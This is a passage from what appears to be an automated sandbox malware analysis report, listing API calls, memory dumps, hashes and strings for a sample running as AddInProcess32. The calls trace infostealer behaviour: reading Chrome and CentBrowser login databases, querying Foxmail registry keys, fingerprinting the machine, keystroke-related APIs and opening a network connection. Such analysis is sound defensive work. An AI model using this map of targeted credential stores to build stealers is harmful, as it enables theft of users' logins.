                                                                                        • Part of subcall function 6CCD40F7: PR_NewLogModule.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD417E
                                                                                        • Part of subcall function 6CCD40F7: PR_NewLogModule.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD418F
                                                                                        • Part of subcall function 6CCD40F7: PR_NewLogModule.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD41A0
                                                                                        • Part of subcall function 6CCD40F7: PR_NewLogModule.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD41B1
                                                                                        • Part of subcall function 6CCD40F7: PR_NewLogModule.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD41C2
                                                                                        • Part of subcall function 6CCD40F7: PT_FPrintStats.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD41D6
                                                                                        • Part of subcall function 6CCD40F7: PT_FPrintStats.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD41DB
                                                                                        • Part of subcall function 6CCD40F7: PR_NewLock.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD41F9
                                                                                        • Part of subcall function 6CCD40F7: PT_FPrintStats.NSS3(00000000,00000001,00000000,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD421D
                                                                                        • Part of subcall function 6CCD40F7: PR_NewLock.NSS3(00000000,00000001,00000000,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD422C
                                                                                        • Part of subcall function 6CCD40F7: PR_NewCondVar.NSS3(00000000,00000000,00000001,00000000,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD4237
                                                                                        • Part of subcall function 6CCD40F7: PT_FPrintStats.NSS3 ref: 6CCD424E
                                                                                      • PR_Lock.NSS3(?,?,?,6CCC6EED,6CD88840,R), ref: 6CCD3A1A
                                                                                        • Part of subcall function 6CCD98BD: EnterCriticalSection.KERNEL32(?,774CDF20,00000000,?,6CCD9FF0,?,?,?,?,?,?,?,6CCC7CFB,00000000,?,6CCD411D), ref: 6CCD98D0
                                                                                      • PR_WaitCondVar.NSS3(000000FF,?,?,6CCC6EED,6CD88840,R), ref: 6CCD3A29
                                                                                      • PR_Unlock.NSS3(?,6CCC6EED,6CD88840,R), ref: 6CCD3A3A
                                                                                      • PR_SetError.NSS3(FFFFE8DB,00000000,?,?,?,6CCC6EED,6CD88840,R), ref: 6CCD3A4C
                                                                                        • Part of subcall function 6CCD36F3: PR_GetCurrentThread.NSS3(?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD36F6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Module$LockPrintStats$Cond$Unlock$CriticalCurrentEnterErrorNotifyPageSectionSizeThreadWait
                                                                                      • String ID:
                                                                                      • API String ID: 3904423802-0
                                                                                      • Opcode ID: 2a1390ae2ce56df1a2d649062b38d8ab5f64a79023152b7cc20c8a05e8714ce3
                                                                                      • Instruction ID: 305be947add1adf7f24d870198987d2cfedda22004daf3597cd8b4eedf6f2d9e
                                                                                      • Opcode Fuzzy Hash: 2a1390ae2ce56df1a2d649062b38d8ab5f64a79023152b7cc20c8a05e8714ce3
                                                                                      • Instruction Fuzzy Hash: 3701A135216601DADF019F95DC10A8673F4FB43738B2A416EE79956A60FF3170C4DB50
                                                                                      APIs
                                                                                      • InitializeCriticalSection.KERNEL32(0055A808,?,00401251), ref: 00409138
                                                                                      • LoadLibraryW.KERNEL32(User32.dll,?,00401251), ref: 00409163
                                                                                        • Part of subcall function 00411E88: lstrcmpA.KERNEL32(?,Q2A,?,open,00413251), ref: 00411EC1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalInitializeLibraryLoadSectionlstrcmp
                                                                                      • String ID: GetRawInputData$MapVirtualKeyA$ToUnicode$User32.dll
                                                                                      • API String ID: 4274177235-2474467583
                                                                                      • Opcode ID: f21f6e8379296c15d73bc2c2e3701995bbe6fe40c5bb1bf2bee41da66eabdbff
                                                                                      • Instruction ID: d1db26310c3b7d33376476d0bb5eea29622b7161c180695f05f3ce86934a789e
                                                                                      • Opcode Fuzzy Hash: f21f6e8379296c15d73bc2c2e3701995bbe6fe40c5bb1bf2bee41da66eabdbff
                                                                                      • Instruction Fuzzy Hash: 980144B16643504B8700AB697C255693EF1FB9D702310832FE90497360E73809CBDB8E
                                                                                      APIs
                                                                                        • Part of subcall function 00403237: lstrcatA.KERNEL32(00000000,759801C0,?,00000000,?,004036D6,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 00403263
                                                                                        • Part of subcall function 0041178E: WaitForSingleObject.KERNEL32(?,000000FF,00405974,759801C0,?,?,00000000,00404FB9,?,?,?,?,?,00000000,759801C0), ref: 00411792
                                                                                      • getaddrinfo.WS2_32(759801C0,00000000,00404FB9,00000000), ref: 00405998
                                                                                      • socket.WS2_32(00000002,00000001,00000000), ref: 004059AF
                                                                                      • htons.WS2_32(00000000), ref: 004059D5
                                                                                      • freeaddrinfo.WS2_32(00000000), ref: 004059E5
                                                                                      • connect.WS2_32(?,?,00000010), ref: 004059F1
                                                                                      • ReleaseMutex.KERNEL32(?), ref: 00405A1B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: MutexObjectReleaseSingleWaitconnectfreeaddrinfogetaddrinfohtonslstrcatsocket
                                                                                      • String ID:
                                                                                      • API String ID: 2516106447-0
                                                                                      • Opcode ID: c258d490acdb0b488783c694752f3a28ef6200513261933e4d17fdd22df78f8b
                                                                                      • Instruction ID: 9847916f8b98b7b597607d954632222e8a2bcfa95c272735c2b26949272ee6fd
                                                                                      • Opcode Fuzzy Hash: c258d490acdb0b488783c694752f3a28ef6200513261933e4d17fdd22df78f8b
                                                                                      • Instruction Fuzzy Hash: DD219C71A00208ABDF10DF65CC88BDA7BB9EF44324F10856AFD19EB2A1D7359A41DF64
                                                                                      APIs
                                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000,?), ref: 0040C341
                                                                                      • GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,0040B9AA), ref: 0040C357
                                                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,00000000,?), ref: 0040C372
                                                                                      • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,?), ref: 0040C38A
                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,0040B9AA,\Google\Chrome\User Data\Default\Login Data), ref: 0040C3AD
                                                                                        • Part of subcall function 0040C3B9: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3D8
                                                                                        • Part of subcall function 0040C3B9: LocalAlloc.KERNEL32(00000040,?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C3E6
                                                                                        • Part of subcall function 0040C3B9: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3FC
                                                                                        • Part of subcall function 0040C3B9: LocalFree.KERNEL32(?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C40A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FileLocal$AllocBinaryCryptString$CloseCreateFreeHandleReadSize
                                                                                      • String ID:
                                                                                      • API String ID: 4225742195-0
                                                                                      • Opcode ID: 7808e07875b2e4740a3c85fc7c8b99c4ce96716a74113defd5bd93085088574c
                                                                                      • Instruction ID: 02c412f26371b87ae011b2f5e9937fc2d134ed4a40de9b12e1d11bca91295adc
                                                                                      • Opcode Fuzzy Hash: 7808e07875b2e4740a3c85fc7c8b99c4ce96716a74113defd5bd93085088574c
                                                                                      • Instruction Fuzzy Hash: 3D119371610214EBCB219B65DC84AAF7BB8EF49750B10827AFD01E6290D7389D01CBA8
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 6CCCFEBC
                                                                                      • GetCurrentThread.KERNEL32 ref: 6CCCFEC3
                                                                                      • GetCurrentProcess.KERNEL32(00000000), ref: 6CCCFECA
                                                                                      • DuplicateHandle.KERNELBASE(00000000), ref: 6CCCFED1
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CCCFEE0
                                                                                      • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,00000000), ref: 6CCCFEF7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Current$ProcessThread$CreateDuplicateHandleSemaphore
                                                                                      • String ID:
                                                                                      • API String ID: 985710985-0
                                                                                      • Opcode ID: 7a96f68f495ac9f229387b37a6654bb34dc4bdcb96a318148dfd4c644224bb35
                                                                                      • Instruction ID: 2c75338146b26448874a59ae967e0e355de3b25944c3669fd255296bae84c11e
                                                                                      • Opcode Fuzzy Hash: 7a96f68f495ac9f229387b37a6654bb34dc4bdcb96a318148dfd4c644224bb35
                                                                                      • Instruction Fuzzy Hash: BB0144B1704746BFFB004BB58C48F97BBBCFF0A398F404616B626C6480DB74A8408B61
                                                                                      APIs
                                                                                      • _NSSUTIL_UTF8ToWide.NSS3(00000000,00000000,?,?,6CD1DA41,?,6CD6F94C), ref: 6CD1E39C
                                                                                        • Part of subcall function 6CD1D6B8: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,?,6CD1E3FA,00000000,00000000,?,6CD1DA24,?,?,6CD1D5AD), ref: 6CD1D6D0
                                                                                        • Part of subcall function 6CD1D6B8: PORT_Alloc_Util.NSS3(00000000,00000000,?,6CD1E3FA,00000000,00000000,?,6CD1DA24,?,?,6CD1D5AD), ref: 6CD1D6E1
                                                                                        • Part of subcall function 6CD1D6B8: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,?,6CD1E3FA,00000000,00000000,?,6CD1DA24,?,?,6CD1D5AD), ref: 6CD1D6FB
                                                                                        • Part of subcall function 6CD1D6B8: PORT_Free_Util.NSS3(00000000,?,6CD1E3FA,00000000,00000000,?,6CD1DA24,?,?,6CD1D5AD), ref: 6CD1D706
                                                                                      • _NSSUTIL_UTF8ToWide.NSS3(00000000,00000000,?,?,6CD1DA41,?,6CD6F94C), ref: 6CD1E3AB
                                                                                      • PORT_Free_Util.NSS3(00000000,00000000,?,?,6CD1DA41,?,6CD6F94C), ref: 6CD1E3B8
                                                                                      • _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,?,00000000,?,?,6CD1DA41,?,6CD6F94C), ref: 6CD1E3C7
                                                                                      • PORT_Free_Util.NSS3(00000000,?,6CD1DA41,?,6CD6F94C), ref: 6CD1E3D0
                                                                                      • PORT_Free_Util.NSS3(00000000,00000000,?,6CD1DA41,?,6CD6F94C), ref: 6CD1E3D6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Free_Wide$ByteCharMulti$Alloc__wfopen
                                                                                      • String ID:
                                                                                      • API String ID: 4035294277-0
                                                                                      • Opcode ID: 486714d66076f1e2e0d471da1dc76caa136bdd0ebd92c63d6b067e6be4ae9c8d
                                                                                      • Instruction ID: 3368b869174be90e91e381b1938a41e6027f6ad2aac483ac9123be2436965675
                                                                                      • Opcode Fuzzy Hash: 486714d66076f1e2e0d471da1dc76caa136bdd0ebd92c63d6b067e6be4ae9c8d
                                                                                      • Instruction Fuzzy Hash: E2F0B43220D548ABE70267A9BC887EA33ADDB825ADF604039F50956F70DB34880446F0
                                                                                      APIs
                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CC647A2
                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CC647C5
                                                                                      • ReadFile.KERNEL32(?,00000000,?,?,?), ref: 6CC64825
                                                                                      • memset.VCRUNTIME140(?,00000000,?), ref: 6CC6489B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy$FileReadmemset
                                                                                      • String ID: winRead
                                                                                      • API String ID: 2051157613-2759563040
                                                                                      • Opcode ID: b11469a3fd8622a7924e19734776447d8e80fd266ddec4ff6fd457583d67662f
                                                                                      • Instruction ID: 41c81ec532e812f6a0a3c16906a2531d57ede8b7c18ae8c8d37d44dd316c675c
                                                                                      • Opcode Fuzzy Hash: b11469a3fd8622a7924e19734776447d8e80fd266ddec4ff6fd457583d67662f
                                                                                      • Instruction Fuzzy Hash: BB41A072A00208AFDB14CFA9CD919DEB7B9EF49314B148169E905E7B40E730FE44CBA1
                                                                                      APIs
                                                                                      • sqlite3_reset.NSS3(?,?,?,?,6CC65F40,?), ref: 6CCA9AFC
                                                                                        • Part of subcall function 6CC6666E: sqlite3_mutex_enter.NSS3(?,?,?,?,6CCA9B01,?,?,?,?,6CC65F40,?), ref: 6CC6667F
                                                                                        • Part of subcall function 6CC6666E: sqlite3_mutex_leave.NSS3(?,?,?,?,?,?,?,?,6CCA9B01,?,?,?,?,6CC65F40,?), ref: 6CC666BC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_mutex_entersqlite3_mutex_leavesqlite3_reset
                                                                                      • String ID: d$d$e$e
                                                                                      • API String ID: 2269902797-3211158774
                                                                                      • Opcode ID: 72f4fcf0c59f9a41c687784282cc6a1587a861b0817997064d9207474396de7c
                                                                                      • Instruction ID: 6000ab6766c2b5934fc263d42edf9bb32ac234d9b6863a5af8c4c90a596a5677
                                                                                      • Opcode Fuzzy Hash: 72f4fcf0c59f9a41c687784282cc6a1587a861b0817997064d9207474396de7c
                                                                                      • Instruction Fuzzy Hash: D641FD31619F43DFE7288BB5A44A792B7E4BF0531CF20022ED59981D81F773A446C745
                                                                                      APIs
                                                                                        • Part of subcall function 00410D2D: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00410D44
                                                                                        • Part of subcall function 00410D2D: CoInitialize.OLE32(00000000), ref: 00410D4B
                                                                                        • Part of subcall function 00410D2D: CoCreateInstance.OLE32(004174B0,00000000,00000017,00419CC8,?,?,?,?,?,?,?,?,?,00402E47), ref: 00410D69
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402E56
                                                                                        • Part of subcall function 004134A2: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?,?,00415553), ref: 004134CF
                                                                                        • Part of subcall function 004134A2: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00415553), ref: 004134E2
                                                                                        • Part of subcall function 004134A2: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,00415553), ref: 004134F3
                                                                                        • Part of subcall function 004134A2: CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,00415553), ref: 00413500
                                                                                        • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                                        • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                                        • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL(?,00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403732
                                                                                        • Part of subcall function 00410F3E: GlobalMemoryStatusEx.KERNEL32(?), ref: 00410F4F
                                                                                        • Part of subcall function 0041119D: GetComputerNameW.KERNEL32(00402EBA,00000010), ref: 004111C0
                                                                                        • Part of subcall function 00411177: GetCurrentProcess.KERNEL32(?,?,00402EBF,?,00417668,?,?,00000000,?,?,?), ref: 0041117B
                                                                                        • Part of subcall function 0041111B: GetCurrentProcess.KERNEL32(00000008,00000000,759801C0,00000000,759801C0,00000000,?,?,?,?,0041563F,?), ref: 0041112D
                                                                                        • Part of subcall function 0041111B: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0041563F,?), ref: 00411134
                                                                                        • Part of subcall function 0041111B: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,0041563F,?), ref: 00411152
                                                                                        • Part of subcall function 0041111B: CloseHandle.KERNEL32(00000000), ref: 00411167
                                                                                        • Part of subcall function 00410F61: LoadLibraryA.KERNEL32(ntdll.dll), ref: 00410F79
                                                                                        • Part of subcall function 00410F61: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00410F89
                                                                                        • Part of subcall function 004111D7: RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00000101,?,SOFTWARE\Microsoft\Cryptography,?,?,?,?,00000000,?,?,?), ref: 0041121B
                                                                                      • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?,?,?,?), ref: 00402F1A
                                                                                      • lstrcatW.KERNEL32(?,\Microsoft Vision\,?,?), ref: 00402F2C
                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 00402F3A
                                                                                        • Part of subcall function 0040906F: InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 0040907B
                                                                                        • Part of subcall function 0040906F: DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 00409092
                                                                                        • Part of subcall function 0040906F: EnterCriticalSection.KERNEL32(0055A808,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 0040909E
                                                                                        • Part of subcall function 0040906F: GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 004090AE
                                                                                        • Part of subcall function 0040906F: LeaveCriticalSection.KERNEL32(0055A808,?,00000000), ref: 00409101
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalFileSection$CreateHandleInitializeProcess$CloseCurrentModuleNameOpenTokenlstrlen$AddressComputerDeleteDirectoryDispatcherEnterExceptionFolderGlobalInformationInstanceLeaveLibraryLoadMemoryPathProcReadSecuritySizeStatusUserlstrcat
                                                                                      • String ID: \Microsoft Vision\
                                                                                      • API String ID: 1042978627-1618823865
                                                                                      • Opcode ID: 015feacac85b48837122c48e6b70ebfc2244dc314be72c679665d3790fc8cc39
                                                                                      • Instruction ID: 851052fb16c6d29596c0b523666286a16417f9887d42e77abec1e0ca40aba6c7
                                                                                      • Opcode Fuzzy Hash: 015feacac85b48837122c48e6b70ebfc2244dc314be72c679665d3790fc8cc39
                                                                                      • Instruction Fuzzy Hash: 56318571A005197BCF14FBA2DC46DEEB77CAF44308F00046EB205B21D1DA7C5A858B99
                                                                                      APIs
                                                                                        • Part of subcall function 6CCEE117: PORT_Alloc_Util.NSS3(6CD60CFF,00000000,?,00000000,?,?,?,6CCEE0C2,00000000,6CCEE53F,?,00000000,?,?,00000000), ref: 6CCEE168
                                                                                        • Part of subcall function 6CCEE117: memcpy.VCRUNTIME140(00000000,00000000,00000001,00000000,?,00000000,?,?,?,6CCEE0C2,00000000,6CCEE53F,?,00000000,?,?), ref: 6CCEE17D
                                                                                        • Part of subcall function 6CCEE117: strrchr.VCRUNTIME140(6CCEE53F,0000002F,6CCEE53F,00000000,?), ref: 6CCEE1B0
                                                                                        • Part of subcall function 6CCEE117: PORT_Alloc_Util.NSS3(00000000,6CCEE53F,00000000,?), ref: 6CCEE1C4
                                                                                        • Part of subcall function 6CCEE117: PORT_Free_Util.NSS3(00000000,6CCEE53F,00000000,?), ref: 6CCEE1D2
                                                                                      • _wcsftime.LIBCMT(Root Certs,?,00000000,00000000,?,6CCEE53F,00000000,?), ref: 6CCEE0D4
                                                                                        • Part of subcall function 6CD13D96: SECMOD_AddNewModuleEx.NSS3(00000000,00000000,?,6CCEE0FB,00000000,00000000,?,6CCEE0FB,Root Certs,00000000,00000000,00000000,?,6CCEE53F,00000000,?), ref: 6CD13DA9
                                                                                        • Part of subcall function 6CD136F3: SECMOD_GetDefaultModuleListLock.NSS3(?,00000000,00000000,00000000,?,6CCEE4CE), ref: 6CD136FA
                                                                                        • Part of subcall function 6CD136F3: PORT_SetError_Util.NSS3(FFFFE09A,?,00000000,00000000,00000000,?,6CCEE4CE), ref: 6CD1370C
                                                                                      • _wcsftime.LIBCMT(Root Certs,00000000,00000000,00000000,?,6CCEE53F,00000000,?), ref: 6CCEE0F6
                                                                                      • PORT_Free_Util.NSS3(00000000,?,6CCEE53F,00000000,?), ref: 6CCEE0FF
                                                                                      • PORT_Free_Util.NSS3(?,?,6CCEE53F,00000000,?), ref: 6CCEE10A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Free_$Alloc_Module_wcsftime$DefaultError_ListLockmemcpystrrchr
                                                                                      • String ID: Root Certs
                                                                                      • API String ID: 624154078-225457805
                                                                                      • Opcode ID: 5e08c01f1f9e7367af041854b39ad1415266de7d68ff9048454c769e8de1b47d
                                                                                      • Instruction ID: b3ffd40df38a89a71e1d909f683d9406b510517a24d1e6732189fc7a1b5c54ea
                                                                                      • Opcode Fuzzy Hash: 5e08c01f1f9e7367af041854b39ad1415266de7d68ff9048454c769e8de1b47d
                                                                                      • Instruction Fuzzy Hash: 0E01F2728051187B57219B8A9C85EEF7BBCDEC66A8B10015DFC0867F11FA716E15C2F1
                                                                                      APIs
                                                                                      • RegOpenKeyExA.KERNEL32(80000001,software\Aerofox\FoxmailPreview,00000000,00020019,00000000,?,?,?,?,004096E0,?,00000000,?,0040BB66,?), ref: 0040951A
                                                                                      • RegQueryValueExA.ADVAPI32(00000000,Executable,00000000,00000000,00426868,?,?,?,?,?,004096E0,?,00000000,?,0040BB66,?), ref: 00409541
                                                                                      • PathRemoveFileSpecA.SHLWAPI(00426868,?,?,?,?,004096E0,?,00000000,?,0040BB66,?,?,00000000,?,\CentBrowser\User Data\Default\Login Data,\CentBrowser\User Data\Local State), ref: 0040954C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FileOpenPathQueryRemoveSpecValue
                                                                                      • String ID: Executable$software\Aerofox\FoxmailPreview
                                                                                      • API String ID: 3687894118-2371247776
                                                                                      • Opcode ID: 00374a71c6d41edaef1c2e71d7d119052920faecd5ef0eb5d90ed42a0cf43a85
                                                                                      • Instruction ID: da810012986fcb6c8d8d394bbe01705385cba6e4fa72d30e5428379b1b1cd6da
                                                                                      • Opcode Fuzzy Hash: 00374a71c6d41edaef1c2e71d7d119052920faecd5ef0eb5d90ed42a0cf43a85
                                                                                      • Instruction Fuzzy Hash: 59F0A7B5784304BAEB509B46DC46FDB3BBC9755B04F200079BA05B11C2D2B49A45952C
                                                                                      APIs
                                                                                      • _NSSUTIL_GetSecmodName.NSS3(?,?,?,?,?), ref: 6CD1D51F
                                                                                        • Part of subcall function 6CD1F291: NSSUTIL_ArgStrip.NSS3(?,?,00000000,?,?,?,?,6CD1D524,?,?,?,?,?), ref: 6CD1F2A6
                                                                                        • Part of subcall function 6CD1F291: PL_strncasecmp.NSS3(00000000,configDir=,0000000A,?,00000000,?,?,?,?,6CD1D524,?,?,?,?,?), ref: 6CD1F2BE
                                                                                        • Part of subcall function 6CD1F291: PORT_Free_Util.NSS3(00000000,?), ref: 6CD1F2D2
